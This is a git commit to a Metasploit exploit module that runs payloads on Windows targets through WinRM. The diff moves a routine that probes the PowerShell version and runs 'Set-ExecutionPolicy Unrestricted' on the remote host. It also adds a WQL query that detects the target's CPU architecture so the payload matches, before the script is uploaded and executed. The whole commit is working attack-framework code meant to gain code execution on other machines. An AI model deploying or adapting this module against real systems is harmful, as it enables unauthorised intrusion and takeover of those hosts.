Hopefully final touches

David Maloney · David Maloney · commit 7c141e11c426 · 2012-11-05T10:06:57.000-06:00
Some smftidy cleanup, and added a method to check that the payload is
the correct arch when using the powershell method
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -29,7 +29,7 @@ def initialize(info = {})
 					delivery: Powershell 2.0 and VBS CmdStager.
 
 					The module will check if Powershell 2.0 is available, and if so uses
-					that method. Otherwise it falls back to the VBS Cmdstager which is 
+					that method. Otherwise it falls back to the VBS Cmdstager which is
 					less stealthy.
 
 					IMPORTANT: If targeting an x64 system with the Powershell method
@@ -78,57 +78,13 @@ def check
 		return Msf::Exploit::CheckCode::Vulnerable
 	end
 
-	def powershell2?
-		if datastore['FORCE_VBS']
-			print_status "User selected the FORCE_VBS option"
-			return false
-		end
-		print_status "checking for Powershell 2.0"
-		streams = winrm_run_cmd("powershell Get-Host")
-		if streams == 401
-			print_error "Login failed!"
-			return false
-		end
-		unless streams.class == Hash 
-			print_error "Recieved error while running check"
-			return false
-		end
-		if streams['stderr'].include? "not recognized"
-			print_error "Powershell is not installed"
-			return false
-		end
-		streams['stdout'].each_line do |line|
-			next unless line.start_with? "Version"
-			major_version = line.match(/\d(?=\.)/)[0]
-			if major_version == 1
-				print_error "The target is running an older version of powershell"
-				return false
-			end
-		end
-
-		print_status "Attempting to set Execution Policy"
-		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
-		if streams == 401
-			print_error "Login failed!"
-			return false
-		end
-		unless streams.class == Hash 
-			print_error "Recieved error while running check"
-			return false
-		end
-		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
-		if streams['stdout'].include? 'Unrestricted'
-			print_good "Set Execution Policy Successfully"
-			return true
-		end
-		return false
-	end
 
 	def exploit
 		unless  check == Msf::Exploit::CheckCode::Vulnerable
 			return
 		end
 		if powershell2?
+			return unless correct_payload_arch?
 			path = upload_script
 			return if path.nil?
 			exec_script(path)
@@ -203,6 +159,82 @@ def temp_dir
 		return streams['stdout'].chomp
 	end
 
-	
+	def check_remote_arch
+		wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
+		resp,c = send_request_ntlm(winrm_wql_msg(wql))
+		#Default to x86 if we can't be sure
+		return "x86" if resp.nil? or resp.code != 200
+		resp_tbl = parse_wql_response(resp)
+		addr_width =  resp_tbl.rows.flatten[0]
+		if addr_width == "64"
+			return "x64"
+		else
+			return "x86"
+		end
+	end
+
+	def correct_payload_arch?
+		target_arch = check_remote_arch
+		case target_arch
+		when "x64"
+			unless datastore['PAYLOAD'].include? "x64"
+				print_error "You selected an x86 payload for an x64 target!"
+				return false
+			end
+		when "x86"
+			if datastore['PAYLOAD'].include? "x64"
+				print_error "you selected an x64 payload for an x86 target"
+				return false
+			end
+		end
+		return true
+	end
+
+
+	def powershell2?
+		if datastore['FORCE_VBS']
+			print_status "User selected the FORCE_VBS option"
+			return false
+		end
+		print_status "checking for Powershell 2.0"
+		streams = winrm_run_cmd("powershell Get-Host")
+		if streams == 401
+			print_error "Login failed!"
+			return false
+		end
+		unless streams.class == Hash
+			print_error "Recieved error while running check"
+			return false
+		end
+		if streams['stderr'].include? "not recognized"
+			print_error "Powershell is not installed"
+			return false
+		end
+		streams['stdout'].each_line do |line|
+			next unless line.start_with? "Version"
+			major_version = line.match(/\d(?=\.)/)[0]
+			if major_version == 1
+				print_error "The target is running an older version of powershell"
+				return false
+			end
+		end
+
+		print_status "Attempting to set Execution Policy"
+		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
+		if streams == 401
+			print_error "Login failed!"
+			return false
+		end
+		unless streams.class == Hash
+			print_error "Recieved error while running check"
+			return false
+		end
+		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
+		if streams['stdout'].include? 'Unrestricted'
+			print_good "Set Execution Policy Successfully"
+			return true
+		end
+		return false
+	end
 
 end
